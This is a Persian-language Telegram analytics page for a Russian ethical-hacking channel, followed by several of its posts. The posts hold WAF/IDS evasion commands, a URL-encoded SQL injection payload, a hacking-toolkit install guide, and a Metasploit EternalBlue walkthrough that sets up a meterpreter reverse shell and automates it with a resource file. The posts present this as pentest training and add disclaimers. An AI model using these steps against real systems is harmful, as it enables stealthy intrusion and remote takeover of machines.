CodeGuard: CyberSec Edition
Канал по ИБ и этичному хакингу. Связь: @Arakcheev_Ruslan Ссылка: @invite_CodeGuard Биржа: https://telega.in/c/+3X56uL4A-UM3Njgy
نمایش بیشتر📈 تحلیل کانال تلگرام CodeGuard: CyberSec Edition
کانال CodeGuard: CyberSec Edition بازیگری فعال است. در حال حاضر جامعه شامل 12 634 مشترک است و جایگاه 10 058 را در دسته فناوری و برنامهها و رتبه 52 296 را در منطقه روسيا دارد.
📊 شاخصهای مخاطب و پویایی
از زمان ایجاد در невідомо، پروژه رشد سریعی داشته و 12 634 مشترک جذب کرده است.
بر اساس آخرین دادهها در تاریخ 22 ژوئن, 2026، کانال فعالیت پایداری دارد. در ۳۰ روز گذشته تغییر اعضا برابر 614 و در ۲۴ ساعت گذشته برابر 96 بوده و همچنان دسترسی گستردهای حفظ شده است.
- وضعیت تأیید: تأیید نشده
- نرخ تعامل (ER): میانگین تعامل مخاطب 12.48% است و در ۲۴ ساعت نخست پس از انتشار، محتوا معمولاً 6.78% واکنش نسبت به کل مشترکان کسب میکند.
- دسترسی پستها: هر پست به طور میانگین 1 577 بازدید دریافت میکند. در اولین روز معمولاً 857 بازدید جمعآوری میشود.
- واکنشها و تعامل: مخاطبان بهطور فعال حمایت میکنند؛ میانگین واکنش به هر پست 4 است.
- علایق موضوعی: محتوا بر موضوعات کلیدی مانند codeguard, pysec, docker, grep, контейнер تمرکز دارد.
📝 توضیح و سیاست محتوایی
نویسنده این فضا را محل بیان دیدگاههای شخصی توصیف میکند:
“Канал по ИБ и этичному хакингу.
Связь: @Arakcheev_Ruslan
Ссылка: @invite_CodeGuard
Биржа: https://telega.in/c/+3X56uL4A-UM3Njgy”
به لطف بهروزرسانیهای پرتکرار (آخرین داده در تاریخ 23 ژوئن, 2026)، کانال همواره بهروز و دارای دسترسی بالاست. تحلیلها نشان میدهد مخاطبان بهطور فعال با محتوا تعامل دارند و آن را به نقطه اثرگذاری مهم در دسته فناوری و برنامهها تبدیل کردهاند.
wafw00f https://target.com
*Быстрый сканер, который скажет, защищён ли сайт и каким WAF.*
2. Медленные и тихие сканы на `ffuf`
Стандартные сканеры палят тебя моментально. Забивай на скорость, ставь паузы и делай всё тихо:
ffuf -w /usr/share/wordlists/dirb/common.txt -u https://target.com/FUZZ -p 0.5 -t 10 -o ffuf_results.json
- -p 0.5 — полсекунды между запросами, чтобы не злить WAF/IDS
- -t 10 — не больше 10 потоков, меньше шума
3. Меняем заголовки, чтобы быть незаметным
WAF фильтрует по User-Agent и другим заголовкам — меняй их:
curl -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64)" https://target.com/path
curl -H "X-Forwarded-For: 127.0.0.1" https://target.com/path
Используй прокси и VPN, чтобы сменить IP и не светиться.
4. Кодируем ходы, чтобы сбить алгоритм
Пример с URL-кодированием полезной нагрузки:
curl "https://target.com/search?q=%27%20OR%201=1--"
Так SQL-инъекция выглядит неочевидно для WAF.
5. Медленные циклы с рандомной задержкой
Для обхода IDS:
for url in $(cat urls.txt); do
curl -A "Mozilla/5.0" "$url"
sleep $((RANDOM % 5 + 1)) # пауза случайно от 1 до 5 секунд
done
Медленный и нерегулярный трафик сложнее детектировать.
⚠️ Важно: Все инструменты запускай только на легальных целях и с разрешения владельца.
😈 CodeGuard | #pentest #WAF #OSINT #hackingtoolsgit clone https://github.com/thehackingsage/hacktronian.git
cd hacktronian
chmod +x install.sh
sudo ./install.sh
hacktronian
Для Android (Termux):
pkg install git python
git clone https://github.com/thehackingsage/hacktronian.git
cd hacktronian
chmod +x hacktronian.py
python2 hacktronian.py
📱 Есть подробный видеоруководство на YouTube для быстрого старта.
💡 Советы:
- Используй HACKTRONIAN как единый центр для запуска известных инструментов, экономя время.
- Комбинируй методы сбора информации и эксплуатации для максимальной эффективности.
- Постоянно обновляй и расширяй свои навыки с помощью этого набора.
😈 CodeGuard | #HACKTRONIAN #hackingtoolsВ этой статье Сергей — наш эксперт, который прошел путь от сисадмина до администратора средств защиты и, наконец, пентестера расскажет, где автоматизация незаменима, а где без человеческого мозга не обойтись. Пройдем по всем этапам пентеста от разведки до написания отчета, и посмотрим, как грамотно сочетать силу машин с интуицией специалиста.👩💻 Можете глянуть оригинал 😈 CodeGuard | #cybersecurity
curl https://raw.githubusercontent.com/rapid7/metasploit-framework/master/msfinstall > msfinstall
# Загружаем официальный скрипт установки Metasploit с GitHub и сохраняем его в файл msfinstall
chmod +x msfinstall
# Делаем скрипт исполняемым (разрешаем запуск)
sudo ./msfinstall
# Запускаем скрипт с правами суперпользователя для установки Metasploit на систему
2. Запуск консоли Metasploit
msfconsole
# Запускаем Metasploit в интерактивном режиме — консоль откроется и готова к командам
3. Поиск подходящего эксплойта
search smb
# Ищем все эксплойты и модули, в названии или описании которых есть "smb" — часто используется в атаках на протокол SMB (например, EternalBlue)
4. Выбор эксплойта для работы
use exploit/windows/smb/ms17_010_eternalblue
# Загружаем модуль EternalBlue — один из самых известных эксплойтов для уязвимости в SMB
5. Просмотр и настройка параметров
show options
# Показываем список необходимых параметров для эксплойта — куда нужно указать цели, параметры для подключения и прочее
6. Установка IP и порта цели
set RHOST 192.168.1.100
# RHOST — IP адрес устройства жертвы, куда нацелена атака
set RPORT 445
# RPORT — порт для подключения (445 — стандартный порт SMB)
7. Настройка полезной нагрузки (payload) и параметров обратного подключения
set PAYLOAD windows/x64/meterpreter/reverse_tcp
# Payload — что именно будет выполнено после успешного взлома. Meterpreter — мощная оболочка для управления системой.
set LHOST 192.168.1.50
# LHOST — твой локальный IP-адрес, чтобы жертва могла "позвонить" тебе обратно (обратное TCP-соединение)
set LPORT 4444
# LPORT — порт, на который будет установлен обратный канал связи
8. Запуск эксплойта
exploit
# Запускаем атаку, Metasploit пытается использовать эксплойт и payload для получения доступа
9. Работа с открытыми сессиями
sessions
# Показывает список открытых сессий — активных подключений к "взломанным" машинам
10. Подключение к сессии
sessions -i 1
# Подключаемся к сессии с номером 1 для интерактивного управления удалённой системой
11. Выполнение команд в shell
shell
# Запускаем системный shell удалённого устройства – теперь можно выполнять команды, как будто ты физически работаешь на той машине
ls -la
# Команда списка файлов и папок с подробной информацией — пример простой команды для проверки доступа
12. Автоматизация через resource-файл
Создаём файл auto.rc с содержимым:
use exploit/windows/smb/ms17_010_eternalblue
set RHOST 192.168.1.100
set RPORT 445
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.1.50
set LPORT 4444
exploit
Запуск:
msfconsole -r auto.rc
# Запускаем msfconsole и сразу подгружаем команды из файла auto.rc — автоматизируем весь процесс и не вводим всё вручную
Важные советы для новичков
- Всегда запускай Metasploit на легальных целях и с разрешения владельцев.
- Перед тестом изучай публичные уязвимости и документацию выбранного модуля.
- Используй help и info для подробной информации о командах и эксплойтах.
- Meterpreter-сессии дают огромные возможности — от запуска команд до снятия скриншотов.
- Постепенно изучай post-exploitation модули для расширения контроля над системой.
🤔 Этот мини-гайд — базовый старт для погружения в Metasploit.
ставь реакцию 👍 и поделись постом с другом
😈 CodeGuard | #Metasploit #hackingtools💀 Linux глазами хакера Автор: Михаил Фленов Год издания: 2021Книга, если ты хочешь не просто использовать Linux, а понимать, как он работает изнутри — эта книга станет твоим главным руководством. Не про "как поставить систему". Про как сделать её безопасной, производительной и защищённой. 🧠Что внутри? - Базовое администрирование и управление доступом - Настройка Firewall и защита от атак - Настройка серверов: WEB, FTP, Proxy, DNS - Программы для электронной почты и файлообмена - Политика мониторинга и архивирования данных - Потенциальные уязвимости и как их избежать - Что делать при атаке или взломе — восстановление и предотвращение потери данных - Тестирование безопасности конфигурации (обновлённая информация для Ubuntu) 📌 В шестом издании — актуальная информация и новые инструменты для проверки безопасности. 🔝 Подходит: - Администраторам Linux - Специалистам по безопасности - Тем, кто хочет **понимать, как работает система, а не просто запускать команды** - Всем, кто хочет **строить безопасную и надёжную инфраструктуру** Безопасность начинается с понимания: - Как работают процессы в Linux - Как устроены права доступа - Какие службы могут быть уязвимы - Как защитить систему от реальных атак 📌 Эта книга — не про взлом ради взлома. Она про мышление защитника, который знает, как устроена система, чтобы не дать ей быть сломанной. 💠 Бери книгу → [Archive] 😈 CodeGuard | #book #linux #security
اکنون در دسترس! پژوهش تلگرام ۲۰۲۵ — مهمترین بینشهای سال 
